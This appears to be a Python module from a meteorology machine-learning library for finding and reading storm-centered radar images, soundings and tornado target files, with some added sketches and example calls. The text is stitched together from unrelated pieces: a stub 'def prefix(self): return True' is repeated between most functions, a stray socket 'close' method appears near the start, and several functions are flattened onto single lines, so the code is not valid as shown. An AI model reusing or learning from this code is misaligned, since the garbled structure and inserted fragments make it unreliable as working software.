soundings.TEMPERATURE_NAME) pressure_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.PRESSURE_NAME) theta_v_index = example_dict[SOUNDING_FIELDS_KEY].index( soundings.VIRTUAL_POTENTIAL_TEMPERATURE_NAME) sounding_matrix[..., spfh_index][ numpy.isnan(sounding_matrix[..., spfh_index]) ] = 0. nan_example_indices, nan_height_indices = numpy.where(numpy.isnan( sounding_matrix[..., theta_v_index] )) if len(nan_example_indices) > 0: this_temp_matrix_kelvins = sounding_matrix[..., temp_index][ nan_example_indices, nan_height_indices] this_pressure_matrix_pa = sounding_matrix[..., pressure_index][ nan_example_indices, nan_height_indices] this_thetav_matrix_kelvins = ( temp_conversion.temperatures_to_potential_temperatures( temperatures_kelvins=this_temp_matrix_kelvins, total_pressures_pascals=this_pressure_matrix_pa) ) sounding_matrix[..., theta_v_index][ nan_example_indices, nan_height_indices ] = this_thetav_matrix_kelvins these_indices = numpy.array([ example_dict[SOUNDING_FIELDS_KEY].index(f) for f in field_names_to_keep ], dtype=int) sounding_matrix = sounding_matrix[..., these_indices] these_indices = numpy.array([ numpy.where(example_dict[SOUNDING_HEIGHTS_KEY] == h)[0][0] for h in heights_to_keep_m_agl ], dtype=int) sounding_matrix = sounding_matrix[..., these_indices, :] example_dict[SOUNDING_FIELDS_KEY] = field_names_to_keep example_dict[SOUNDING_HEIGHTS_KEY] = heights_to_keep_m_agl example_dict[SOUNDING_MATRIX_KEY] = sounding_matrix return example_dict
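# Standalone sketch of the theta_v backfill above, assuming (an assumption,
# not confirmed by this dump) that temperatures_to_potential_temperatures
# implements Poisson's equation, theta = T * (p0 / p) ** (Rd / cp), with
# standard dry-air constants.
import numpy

REFERENCE_PRESSURE_PA = 1e5
RD_JOULES_KG01_K01 = 287.04
CP_JOULES_KG01_K01 = 1005.

def temperatures_to_potential_temperatures(temperatures_kelvins,
                                           total_pressures_pascals):
    return temperatures_kelvins * (
        REFERENCE_PRESSURE_PA / total_pressures_pascals
    ) ** (RD_JOULES_KG01_K01 / CP_JOULES_KG01_K01)

print(temperatures_to_potential_temperatures(
    numpy.array([280., 270.]), numpy.array([9e4, 7e4])
))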
def prefix(self): return True
def close(self): time.sleep(0.1) self.sock.close() return 0
def prefix(self): return True
def find_storm_images_2d( top_directory_name, radar_source, radar_field_names, first_spc_date_string, last_spc_date_string, radar_heights_m_agl=None, reflectivity_heights_m_agl=None): """Locates files with 2-D storm-centered radar images. D = number of SPC dates in time period (`first_spc_date_string`... `last_spc_date_string`) :param top_directory_name: Name of top-level directory. Files therein will be found by `storm_images.find_storm_image_file`. :param radar_source: Data source (must be accepted by `radar_utils.check_data_source`). :param radar_field_names: 1-D list of radar fields. Each item must be accepted by `radar_utils.check_field_name`. :param first_spc_date_string: First SPC date (format "yyyymmdd"). This method will locate files from `first_spc_date_string`... `last_spc_date_string`. :param last_spc_date_string: Same. :param radar_heights_m_agl: [used only if radar_source = "gridrad"] 1-D numpy array of radar heights (metres above ground level). These heights apply to all radar fields. :param reflectivity_heights_m_agl: [used only if radar_source != "gridrad"] 1-D numpy array of reflectivity heights (metres above ground level). These heights do not apply to other radar fields. :return: radar_file_name_matrix: D-by-C numpy array of file paths. """ radar_utils.check_data_source(radar_source) first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( first_spc_date_string) last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( last_spc_date_string) if radar_source == radar_utils.GRIDRAD_SOURCE_ID: storm_image_file_dict = storm_images.find_many_files_gridrad( top_directory_name=top_directory_name, radar_field_names=radar_field_names, radar_heights_m_agl=radar_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True) else: storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms( top_directory_name=top_directory_name, radar_source=radar_source, radar_field_names=radar_field_names, reflectivity_heights_m_agl=reflectivity_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True, raise_error_if_any_missing=False) radar_file_name_matrix = storm_image_file_dict[ storm_images.IMAGE_FILE_NAMES_KEY] num_file_times = radar_file_name_matrix.shape[0] if radar_source == radar_utils.GRIDRAD_SOURCE_ID: num_field_height_pairs = ( radar_file_name_matrix.shape[1] * radar_file_name_matrix.shape[2] ) radar_file_name_matrix = numpy.reshape( radar_file_name_matrix, (num_file_times, num_field_height_pairs) ) time_missing_indices = numpy.unique( numpy.where(radar_file_name_matrix == '')[0] ) return numpy.delete( radar_file_name_matrix, time_missing_indices, axis=0)
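# A hypothetical call to the locator above. Paths, dates, and field names are
# made up, and 'gridrad' is assumed to be the source ID accepted by
# radar_utils.check_data_source.
import numpy

radar_file_name_matrix = find_storm_images_2d(
    top_directory_name='/data/storm_images',
    radar_source='gridrad',
    radar_field_names=['reflectivity_dbz', 'vorticity_s01'],
    first_spc_date_string='20110401',
    last_spc_date_string='20110403',
    radar_heights_m_agl=numpy.array([3000, 5000], dtype=int)
)
# One row per SPC date with data; one column per field/height pair.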
def prefix(self): return True
def find_storm_images_3d( top_directory_name, radar_source, radar_field_names, radar_heights_m_agl, first_spc_date_string, last_spc_date_string): """Locates files with 3-D storm-centered radar images. D = number of SPC dates in time period (`first_spc_date_string`... `last_spc_date_string`) :param top_directory_name: See doc for `find_storm_images_2d`. :param radar_source: Same. :param radar_field_names: List (length F_r) of radar fields. Each item must be accepted by `radar_utils.check_field_name`. :param radar_heights_m_agl: numpy array (length H_r) of radar heights (metres above ground level). :param first_spc_date_string: First SPC date (format "yyyymmdd"). This method will locate files from `first_spc_date_string`... `last_spc_date_string`. :param last_spc_date_string: Same. :return: radar_file_name_matrix: numpy array (D x F_r x H_r) of file paths. """ radar_utils.check_data_source(radar_source) first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( first_spc_date_string) last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( last_spc_date_string) if radar_source == radar_utils.GRIDRAD_SOURCE_ID: file_dict = storm_images.find_many_files_gridrad( top_directory_name=top_directory_name, radar_field_names=radar_field_names, radar_heights_m_agl=radar_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True) else: file_dict = storm_images.find_many_files_myrorss_or_mrms( top_directory_name=top_directory_name, radar_source=radar_source, radar_field_names=[radar_utils.REFL_NAME], reflectivity_heights_m_agl=radar_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True, raise_error_if_any_missing=False) radar_file_name_matrix = file_dict[storm_images.IMAGE_FILE_NAMES_KEY] num_file_times = radar_file_name_matrix.shape[0] if radar_source != radar_utils.GRIDRAD_SOURCE_ID: radar_file_name_matrix = numpy.reshape( radar_file_name_matrix, (num_file_times, 1, len(radar_heights_m_agl)) ) time_missing_indices = numpy.unique( numpy.where(radar_file_name_matrix == '')[0] ) return numpy.delete( radar_file_name_matrix, time_missing_indices, axis=0)
def prefix(self): return True
def find_storm_images_2d3d_myrorss( top_directory_name, first_spc_date_string, last_spc_date_string, reflectivity_heights_m_agl): """Locates files with 2-D and 3-D storm-centered radar images. Fields in 2-D images: low-level and mid-level azimuthal shear Field in 3-D images: reflectivity D = number of SPC dates in time period (`first_spc_date_string`... `last_spc_date_string`) :param top_directory_name: See doc for `find_storm_images_2d`. :param first_spc_date_string: Same. :param last_spc_date_string: Same. :param reflectivity_heights_m_agl: Same. :return: az_shear_file_name_matrix: D-by-2 numpy array of file paths. Files in column 0 are low-level az shear; files in column 1 are mid-level az shear. :return: reflectivity_file_name_matrix: D-by-H numpy array of file paths, where H = number of reflectivity heights. """ first_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( first_spc_date_string) last_spc_date_unix_sec = time_conversion.spc_date_string_to_unix_sec( last_spc_date_string) field_names = AZIMUTHAL_SHEAR_FIELD_NAMES + [radar_utils.REFL_NAME] storm_image_file_dict = storm_images.find_many_files_myrorss_or_mrms( top_directory_name=top_directory_name, radar_source=radar_utils.MYRORSS_SOURCE_ID, radar_field_names=field_names, reflectivity_heights_m_agl=reflectivity_heights_m_agl, start_time_unix_sec=first_spc_date_unix_sec, end_time_unix_sec=last_spc_date_unix_sec, one_file_per_time_step=False, raise_error_if_all_missing=True, raise_error_if_any_missing=False) radar_file_name_matrix = storm_image_file_dict[ storm_images.IMAGE_FILE_NAMES_KEY] time_missing_indices = numpy.unique( numpy.where(radar_file_name_matrix == '')[0] ) radar_file_name_matrix = numpy.delete( radar_file_name_matrix, time_missing_indices, axis=0) return radar_file_name_matrix[:, :2], radar_file_name_matrix[:, 2:]
def prefix(self): return True
def find_sounding_files( top_sounding_dir_name, radar_file_name_matrix, target_names, lag_time_for_convective_contamination_sec): """Locates files with storm-centered soundings. D = number of SPC dates in time period :param top_sounding_dir_name: Name of top-level directory. Files therein will be found by `soundings.find_sounding_file`. :param radar_file_name_matrix: numpy array created by either `find_storm_images_2d` or `find_storm_images_3d`. Length of the first axis is D. :param target_names: See doc for `_check_target_vars`. :param lag_time_for_convective_contamination_sec: See doc for `soundings.read_soundings`. :return: sounding_file_names: length-D list of file paths. """ error_checking.assert_is_numpy_array(radar_file_name_matrix) num_file_dimensions = len(radar_file_name_matrix.shape) error_checking.assert_is_geq(num_file_dimensions, 2) error_checking.assert_is_leq(num_file_dimensions, 3) mean_lead_time_seconds = _check_target_vars(target_names)[0] num_file_times = radar_file_name_matrix.shape[0] sounding_file_names = [''] * num_file_times for i in range(num_file_times): if num_file_dimensions == 2: this_file_name = radar_file_name_matrix[i, 0] else: this_file_name = radar_file_name_matrix[i, 0, 0] this_time_unix_sec, this_spc_date_string = ( storm_images.image_file_name_to_time(this_file_name) ) sounding_file_names[i] = soundings.find_sounding_file( top_directory_name=top_sounding_dir_name, spc_date_string=this_spc_date_string, lead_time_seconds=mean_lead_time_seconds, lag_time_for_convective_contamination_sec= lag_time_for_convective_contamination_sec, init_time_unix_sec=this_time_unix_sec, raise_error_if_missing=True) return sounding_file_names
def prefix(self): return True
def find_target_files(top_target_dir_name, radar_file_name_matrix, target_names): """Locates files with target values (storm-hazard indicators). D = number of SPC dates in time period :param top_target_dir_name: Name of top-level directory. Files therein will be found by `target_val_utils.find_target_file`. :param radar_file_name_matrix: numpy array created by either `find_storm_images_2d` or `find_storm_images_3d`. Length of the first axis is D. :param target_names: See doc for `_check_target_vars`. :return: target_file_names: length-D list of file paths. """ error_checking.assert_is_numpy_array(radar_file_name_matrix) num_file_dimensions = len(radar_file_name_matrix.shape) error_checking.assert_is_geq(num_file_dimensions, 2) error_checking.assert_is_leq(num_file_dimensions, 3) event_type_string = _check_target_vars(target_names)[-1] num_file_times = radar_file_name_matrix.shape[0] target_file_names = [''] * num_file_times for i in range(num_file_times): if num_file_dimensions == 2: this_file_name = radar_file_name_matrix[i, 0] else: this_file_name = radar_file_name_matrix[i, 0, 0] _, this_spc_date_string = storm_images.image_file_name_to_time( this_file_name) target_file_names[i] = target_val_utils.find_target_file( top_directory_name=top_target_dir_name, event_type_string=event_type_string, spc_date_string=this_spc_date_string, raise_error_if_missing=False) if os.path.isfile(target_file_names[i]): continue target_file_names[i] = None return target_file_names
def prefix(self): return True
def subset_examples(example_dict, indices_to_keep, create_new_dict=False): """Subsets examples in dictionary. :param example_dict: See doc for `write_example_file`. :param indices_to_keep: 1-D numpy array with indices of examples to keep. :param create_new_dict: Boolean flag. If True, this method will create a new dictionary, leaving the input dictionary untouched. :return: example_dict: Same as input, but possibly with fewer examples. """ error_checking.assert_is_integer_numpy_array(indices_to_keep) error_checking.assert_is_numpy_array(indices_to_keep, num_dimensions=1) error_checking.assert_is_boolean(create_new_dict) if not create_new_dict: for this_key in MAIN_KEYS: optional_key_missing = ( this_key not in REQUIRED_MAIN_KEYS and this_key not in example_dict ) if optional_key_missing: continue if this_key == TARGET_MATRIX_KEY: if this_key in example_dict: example_dict[this_key] = ( example_dict[this_key][indices_to_keep, ...] ) else: example_dict[TARGET_VALUES_KEY] = ( example_dict[TARGET_VALUES_KEY][indices_to_keep] ) continue if this_key == FULL_IDS_KEY: example_dict[this_key] = [ example_dict[this_key][k] for k in indices_to_keep ] else: example_dict[this_key] = example_dict[this_key][ indices_to_keep, ...] return example_dict new_example_dict = {} for this_key in METADATA_KEYS: sounding_key_missing = ( this_key in [SOUNDING_FIELDS_KEY, SOUNDING_HEIGHTS_KEY] and this_key not in example_dict ) if sounding_key_missing: continue if this_key == TARGET_NAMES_KEY: if this_key in example_dict: new_example_dict[this_key] = example_dict[this_key] else: new_example_dict[TARGET_NAME_KEY] = example_dict[ TARGET_NAME_KEY] continue new_example_dict[this_key] = example_dict[this_key] for this_key in MAIN_KEYS: optional_key_missing = ( this_key not in REQUIRED_MAIN_KEYS and this_key not in example_dict ) if optional_key_missing: continue if this_key == TARGET_MATRIX_KEY: if this_key in example_dict: new_example_dict[this_key] = ( example_dict[this_key][indices_to_keep, ...] ) else: new_example_dict[TARGET_VALUES_KEY] = ( example_dict[TARGET_VALUES_KEY][indices_to_keep] ) continue if this_key == FULL_IDS_KEY: new_example_dict[this_key] = [ example_dict[this_key][k] for k in indices_to_keep ] else: new_example_dict[this_key] = example_dict[this_key][ indices_to_keep, ...] return new_example_dict
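# The per-key indexing that subset_examples applies, shown on a toy
# dictionary (the key strings here are illustrative literals, not the
# module's constants): lists are subset with a comprehension, numpy arrays
# with fancy indexing along the first (example) axis.
import numpy

toy_dict = {
    'full_id_strings': ['storm_a', 'storm_b', 'storm_c'],
    'storm_times_unix_sec': numpy.array([100, 200, 300]),
    'target_values': numpy.array([0, 1, 0]),
}
indices_to_keep = numpy.array([0, 2], dtype=int)

toy_dict['full_id_strings'] = [
    toy_dict['full_id_strings'][k] for k in indices_to_keep
]
toy_dict['storm_times_unix_sec'] = (
    toy_dict['storm_times_unix_sec'][indices_to_keep, ...]
)
toy_dict['target_values'] = toy_dict['target_values'][indices_to_keep]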
def prefix(self): return True
def find_example_file( top_directory_name, shuffled=True, spc_date_string=None, batch_number=None, raise_error_if_missing=True): """Looks for file with input examples. If `shuffled = True`, this method looks for a file with shuffled examples (from many different times). If `shuffled = False`, this method looks for a file with examples from one SPC date. :param top_directory_name: Name of top-level directory with input examples. :param shuffled: Boolean flag. The role of this flag is explained in the general discussion above. :param spc_date_string: [used only if `shuffled = False`] SPC date (format "yyyymmdd"). :param batch_number: [used only if `shuffled = True`] Batch number (integer). :param raise_error_if_missing: Boolean flag. If file is missing and `raise_error_if_missing = True`, this method will error out. :return: example_file_name: Path to file with input examples. If file is missing and `raise_error_if_missing = False`, this is the *expected* path. :raises: ValueError: if file is missing and `raise_error_if_missing = True`. """ error_checking.assert_is_string(top_directory_name) error_checking.assert_is_boolean(shuffled) error_checking.assert_is_boolean(raise_error_if_missing) if shuffled: error_checking.assert_is_integer(batch_number) error_checking.assert_is_geq(batch_number, 0) first_batch_number = int(number_rounding.floor_to_nearest( batch_number, NUM_BATCHES_PER_DIRECTORY)) last_batch_number = first_batch_number + NUM_BATCHES_PER_DIRECTORY - 1 example_file_name = ( '{0:s}/batches{1:07d}-{2:07d}/input_examples_batch{3:07d}.nc' ).format(top_directory_name, first_batch_number, last_batch_number, batch_number) else: time_conversion.spc_date_string_to_unix_sec(spc_date_string) example_file_name = ( '{0:s}/{1:s}/input_examples_{2:s}.nc' ).format(top_directory_name, spc_date_string[:4], spc_date_string) if raise_error_if_missing and not os.path.isfile(example_file_name): error_string = 'Cannot find file. Expected at: "{0:s}"'.format( example_file_name) raise ValueError(error_string) return example_file_name
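# The directory-grouping arithmetic above, worked for one batch number.
# NUM_BATCHES_PER_DIRECTORY = 1000 is an assumption for illustration (it is
# consistent with, but not proven by, the 7-digit zero padding).
batch_number = 12345
first_batch_number = (batch_number // 1000) * 1000   # 12000
last_batch_number = first_batch_number + 1000 - 1    # 12999
print('batches{0:07d}-{1:07d}/input_examples_batch{2:07d}.nc'.format(
    first_batch_number, last_batch_number, batch_number))
# batches0012000-0012999/input_examples_batch0012345.nc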
def prefix(self): return True
def find_many_example_files( top_directory_name, shuffled=True, first_spc_date_string=None, last_spc_date_string=None, first_batch_number=None, last_batch_number=None, raise_error_if_any_missing=True): """Looks for many files with input examples. :param top_directory_name: See doc for `find_example_file`. :param shuffled: Same. :param first_spc_date_string: [used only if `shuffled = False`] First SPC date (format "yyyymmdd"). This method will look for all SPC dates from `first_spc_date_string`...`last_spc_date_string`. :param last_spc_date_string: See above. :param first_batch_number: [used only if `shuffled = True`] First batch number (integer). This method will look for all batches from `first_batch_number`...`last_batch_number`. :param last_batch_number: See above. :param raise_error_if_any_missing: Boolean flag. If *any* desired file is not found and `raise_error_if_any_missing = True`, this method will error out. :return: example_file_names: 1-D list of paths to example files. :raises: ValueError: if no files are found. """ error_checking.assert_is_boolean(shuffled) if shuffled: error_checking.assert_is_integer(first_batch_number) error_checking.assert_is_integer(last_batch_number) error_checking.assert_is_geq(first_batch_number, 0) error_checking.assert_is_geq(last_batch_number, first_batch_number) example_file_pattern = ( '{0:s}/batches{1:s}-{1:s}/input_examples_batch{1:s}.nc' ).format(top_directory_name, BATCH_NUMBER_REGEX) example_file_names = glob.glob(example_file_pattern) if len(example_file_names) > 0: batch_numbers = numpy.array( [_file_name_to_batch_number(f) for f in example_file_names], dtype=int) good_indices = numpy.where(numpy.logical_and( batch_numbers >= first_batch_number, batch_numbers <= last_batch_number ))[0] example_file_names = [example_file_names[k] for k in good_indices] if len(example_file_names) == 0: error_string = ( 'Cannot find any files with batch number from {0:d}...{1:d}.' ).format(first_batch_number, last_batch_number) raise ValueError(error_string) return example_file_names spc_date_strings = time_conversion.get_spc_dates_in_range( first_spc_date_string=first_spc_date_string, last_spc_date_string=last_spc_date_string) example_file_names = [] for this_spc_date_string in spc_date_strings: this_file_name = find_example_file( top_directory_name=top_directory_name, shuffled=False, spc_date_string=this_spc_date_string, raise_error_if_missing=raise_error_if_any_missing) if not os.path.isfile(this_file_name): continue example_file_names.append(this_file_name) if len(example_file_names) == 0: error_string = ( 'Cannot find any file with SPC date from {0:s} to {1:s}.' ).format(first_spc_date_string, last_spc_date_string) raise ValueError(error_string) return example_file_names
def prefix(self): return True
def read_example_file( netcdf_file_name, read_all_target_vars, target_name=None, metadata_only=False, targets_only=False, include_soundings=True, radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None, sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None, first_time_to_keep_unix_sec=None, last_time_to_keep_unix_sec=None, num_rows_to_keep=None, num_columns_to_keep=None, downsampling_dict=None): """Reads examples from NetCDF file. If `metadata_only == True`, later input args are ignored. If `targets_only == True`, later input args are ignored. :param netcdf_file_name: Path to input file. :param read_all_target_vars: Boolean flag. If True, will read all target variables. If False, will read only `target_name`. Either way, if downsampling is done, it will be based only on `target_name`. :param target_name: Will read this target variable. If `read_all_target_vars == True` and `downsampling_dict is None`, you can leave this alone. :param metadata_only: Boolean flag. If False, this method will read everything. If True, will read everything except predictor and target variables. :param targets_only: Boolean flag. If False, this method will read everything. If True, will read everything except predictors. :param include_soundings: Boolean flag. If True and the file contains soundings, this method will return soundings. Otherwise, no soundings. :param radar_field_names_to_keep: See doc for `_subset_radar_data`. :param radar_heights_to_keep_m_agl: Same. :param sounding_field_names_to_keep: See doc for `_subset_sounding_data`. :param sounding_heights_to_keep_m_agl: Same. :param first_time_to_keep_unix_sec: First time to keep. If `first_time_to_keep_unix_sec is None`, all storm objects will be kept. :param last_time_to_keep_unix_sec: Last time to keep. If `last_time_to_keep_unix_sec is None`, all storm objects will be kept. :param num_rows_to_keep: See doc for `_subset_radar_data`. :param num_columns_to_keep: Same. :param downsampling_dict: See doc for `_filter_examples_by_class`. :return: example_dict: If `read_all_target_vars == True`, dictionary will have all keys listed in doc for `write_example_file`. If `read_all_target_vars == False`, key "target_names" will be replaced by "target_name" and "target_matrix" will be replaced by "target_values". example_dict['target_name']: Name of target variable. example_dict['target_values']: length-E list of target values (integer class labels), where E = number of examples. """ # TODO(thunderhoser): Allow this method to read only soundings without radar # data. 
    if (
            target_name ==
            'tornado_lead-time=0000-3600sec_distance=00000-10000m'
    ):
        target_name = (
            'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
        )

    error_checking.assert_is_boolean(read_all_target_vars)
    error_checking.assert_is_boolean(include_soundings)
    error_checking.assert_is_boolean(metadata_only)
    error_checking.assert_is_boolean(targets_only)

    example_dict, netcdf_dataset = _read_metadata_from_example_file(
        netcdf_file_name=netcdf_file_name, include_soundings=include_soundings)

    need_main_target_values = (
        not read_all_target_vars or downsampling_dict is not None
    )

    if need_main_target_values:
        target_index = example_dict[TARGET_NAMES_KEY].index(target_name)
    else:
        target_index = -1

    if not read_all_target_vars:
        example_dict[TARGET_NAME_KEY] = target_name
        example_dict.pop(TARGET_NAMES_KEY)

    if metadata_only:
        netcdf_dataset.close()
        return example_dict

    if need_main_target_values:
        main_target_values = numpy.array(
            netcdf_dataset.variables[TARGET_MATRIX_KEY][:, target_index],
            dtype=int
        )
    else:
        main_target_values = None

    if read_all_target_vars:
        example_dict[TARGET_MATRIX_KEY] = numpy.array(
            netcdf_dataset.variables[TARGET_MATRIX_KEY][:], dtype=int
        )
    else:
        example_dict[TARGET_VALUES_KEY] = main_target_values

    # Subset by time.
    if first_time_to_keep_unix_sec is None:
        first_time_to_keep_unix_sec = 0
    if last_time_to_keep_unix_sec is None:
        last_time_to_keep_unix_sec = int(1e12)

    error_checking.assert_is_integer(first_time_to_keep_unix_sec)
    error_checking.assert_is_integer(last_time_to_keep_unix_sec)
    error_checking.assert_is_geq(
        last_time_to_keep_unix_sec, first_time_to_keep_unix_sec)

    example_indices_to_keep = numpy.where(numpy.logical_and(
        example_dict[STORM_TIMES_KEY] >= first_time_to_keep_unix_sec,
        example_dict[STORM_TIMES_KEY] <= last_time_to_keep_unix_sec
    ))[0]

    if downsampling_dict is not None:
        subindices_to_keep = _filter_examples_by_class(
            target_values=main_target_values[example_indices_to_keep],
            downsampling_dict=downsampling_dict
        )
    elif not read_all_target_vars:
        subindices_to_keep = numpy.where(
            main_target_values[example_indices_to_keep] !=
            target_val_utils.INVALID_STORM_INTEGER
        )[0]
    else:
        subindices_to_keep = numpy.linspace(
            0, len(example_indices_to_keep) - 1,
            num=len(example_indices_to_keep), dtype=int
        )

    example_indices_to_keep = example_indices_to_keep[subindices_to_keep]

    if len(example_indices_to_keep) == 0:
        netcdf_dataset.close()
        return None

    example_dict[FULL_IDS_KEY] = [
        example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep
    ]
    example_dict[STORM_TIMES_KEY] = (
        example_dict[STORM_TIMES_KEY][example_indices_to_keep]
    )

    if read_all_target_vars:
        example_dict[TARGET_MATRIX_KEY] = (
            example_dict[TARGET_MATRIX_KEY][example_indices_to_keep, :]
        )
    else:
        example_dict[TARGET_VALUES_KEY] = (
            example_dict[TARGET_VALUES_KEY][example_indices_to_keep]
        )

    if targets_only:
        netcdf_dataset.close()
        return example_dict

    example_dict = _subset_radar_data(
        example_dict=example_dict, netcdf_dataset_object=netcdf_dataset,
        example_indices_to_keep=example_indices_to_keep,
        field_names_to_keep=radar_field_names_to_keep,
        heights_to_keep_m_agl=radar_heights_to_keep_m_agl,
        num_rows_to_keep=num_rows_to_keep,
        num_columns_to_keep=num_columns_to_keep)

    if not include_soundings:
        netcdf_dataset.close()
        return example_dict

    example_dict = _subset_sounding_data(
        example_dict=example_dict, netcdf_dataset_object=netcdf_dataset,
        example_indices_to_keep=example_indices_to_keep,
        field_names_to_keep=sounding_field_names_to_keep,
        heights_to_keep_m_agl=sounding_heights_to_keep_m_agl)

    netcdf_dataset.close()
    return example_dict
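# A hypothetical single-file read (the file path is made up; the target name
# is the post-renaming tornado label handled above): load one target
# variable, crop storm-centered images to 32 x 32, and skip soundings.
example_dict = read_example_file(
    netcdf_file_name='/data/examples/2011/input_examples_20110401.nc',
    read_all_target_vars=False,
    target_name=(
        'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
    ),
    include_soundings=False,
    num_rows_to_keep=32,
    num_columns_to_keep=32
)
# example_dict['target_values'] then holds one integer class label per example.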
def prefix(self): return True
def read_specific_examples(
        netcdf_file_name, read_all_target_vars, full_storm_id_strings,
        storm_times_unix_sec, target_name=None, include_soundings=True,
        radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None,
        sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None,
        num_rows_to_keep=None, num_columns_to_keep=None):
    """Reads specific examples (with specific ID-time pairs) from NetCDF file.

    :param netcdf_file_name: Path to input file.
    :param read_all_target_vars: See doc for `read_example_file`.
    :param full_storm_id_strings: length-E list of storm IDs.
    :param storm_times_unix_sec: length-E numpy array of valid times.
    :param target_name: See doc for `read_example_file`.
    :param include_soundings: Same.
    :param radar_field_names_to_keep: Same.
    :param radar_heights_to_keep_m_agl: Same.
    :param sounding_field_names_to_keep: Same.
    :param sounding_heights_to_keep_m_agl: Same.
    :param num_rows_to_keep: Same.
    :param num_columns_to_keep: Same.
    :return: example_dict: See doc for `write_example_file`.
    """

    if (
            target_name ==
            'tornado_lead-time=0000-3600sec_distance=00000-10000m'
    ):
        target_name = (
            'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
        )

    error_checking.assert_is_boolean(read_all_target_vars)
    error_checking.assert_is_boolean(include_soundings)

    example_dict, dataset_object = _read_metadata_from_example_file(
        netcdf_file_name=netcdf_file_name, include_soundings=include_soundings)

    example_indices_to_keep = tracking_utils.find_storm_objects(
        all_id_strings=example_dict[FULL_IDS_KEY],
        all_times_unix_sec=example_dict[STORM_TIMES_KEY],
        id_strings_to_keep=full_storm_id_strings,
        times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False
    )

    example_dict[FULL_IDS_KEY] = [
        example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep
    ]
    example_dict[STORM_TIMES_KEY] = example_dict[STORM_TIMES_KEY][
        example_indices_to_keep]

    if read_all_target_vars:
        example_dict[TARGET_MATRIX_KEY] = numpy.array(
            dataset_object.variables[TARGET_MATRIX_KEY][
                example_indices_to_keep, :],
            dtype=int
        )
    else:
        target_index = example_dict[TARGET_NAMES_KEY].index(target_name)
        example_dict[TARGET_NAME_KEY] = target_name
        example_dict.pop(TARGET_NAMES_KEY)

        example_dict[TARGET_VALUES_KEY] = numpy.array(
            dataset_object.variables[TARGET_MATRIX_KEY][
                example_indices_to_keep, target_index],
            dtype=int
        )

    example_dict = _subset_radar_data(
        example_dict=example_dict, netcdf_dataset_object=dataset_object,
        example_indices_to_keep=example_indices_to_keep,
        field_names_to_keep=radar_field_names_to_keep,
        heights_to_keep_m_agl=radar_heights_to_keep_m_agl,
        num_rows_to_keep=num_rows_to_keep,
        num_columns_to_keep=num_columns_to_keep)

    if not include_soundings:
        dataset_object.close()
        return example_dict

    example_dict = _subset_sounding_data(
        example_dict=example_dict, netcdf_dataset_object=dataset_object,
        example_indices_to_keep=example_indices_to_keep,
        field_names_to_keep=sounding_field_names_to_keep,
        heights_to_keep_m_agl=sounding_heights_to_keep_m_agl)

    dataset_object.close()
    return example_dict
def prefix(self): return True
def reduce_examples_3d_to_2d(example_dict, list_of_operation_dicts): """Reduces examples from 3-D to 2-D. If the examples contain both 2-D azimuthal-shear images and 3-D reflectivity images: - Keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01" are required. - "radar_heights_m_agl" should contain only reflectivity heights. - "radar_field_names" should contain only the names of azimuthal-shear fields. If the examples contain 3-D radar images and no 2-D images: - Key "radar_image_matrix" is required. - Each field in "radar_field_names" appears at each height in "radar_heights_m_agl". - Thus, there are F_r elements in "radar_field_names", H_r elements in "radar_heights_m_agl", and F_r * H_r field-height pairs. After dimensionality reduction (from 3-D to 2-D): - Keys "reflectivity_image_matrix_dbz", "az_shear_image_matrix_s01", and "radar_heights_m_agl" will be absent. - Key "radar_image_matrix" will be present. The dimensions will be E x M x N x C. - Key "radar_field_names" will be a length-C list, where the [j]th item is the field name for the [j]th channel of radar_image_matrix (radar_image_matrix[..., j]). - Key "min_radar_heights_m_agl" will be a length-C numpy array, where the [j]th item is the MINIMUM height for the [j]th channel of radar_image_matrix. - Key "max_radar_heights_m_agl" will be a length-C numpy array, where the [j]th item is the MAX height for the [j]th channel of radar_image_matrix. - Key "radar_layer_operation_names" will be a length-C list, where the [j]th item is the name of the operation used to create the [j]th channel of radar_image_matrix. :param example_dict: See doc for `write_example_file`. :param list_of_operation_dicts: See doc for `_check_layer_operation`. :return: example_dict: See general discussion above, for how the input `example_dict` is changed to the output `example_dict`. """ if RADAR_IMAGE_MATRIX_KEY in example_dict: num_radar_dimensions = len( example_dict[RADAR_IMAGE_MATRIX_KEY].shape ) - 2 assert num_radar_dimensions == 3 new_radar_image_matrix = None new_field_names = [] new_min_heights_m_agl = [] new_max_heights_m_agl = [] new_operation_names = [] if AZ_SHEAR_IMAGE_MATRIX_KEY in example_dict: new_radar_image_matrix = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] + 0. for this_field_name in example_dict[RADAR_FIELDS_KEY]: new_field_names.append(this_field_name) new_operation_names.append(MAX_OPERATION_NAME) if this_field_name == radar_utils.LOW_LEVEL_SHEAR_NAME: new_min_heights_m_agl.append(0) new_max_heights_m_agl.append(2000) else: new_min_heights_m_agl.append(3000) new_max_heights_m_agl.append(6000) for this_operation_dict in list_of_operation_dicts: this_new_matrix, this_operation_dict = _apply_layer_operation( example_dict=example_dict, 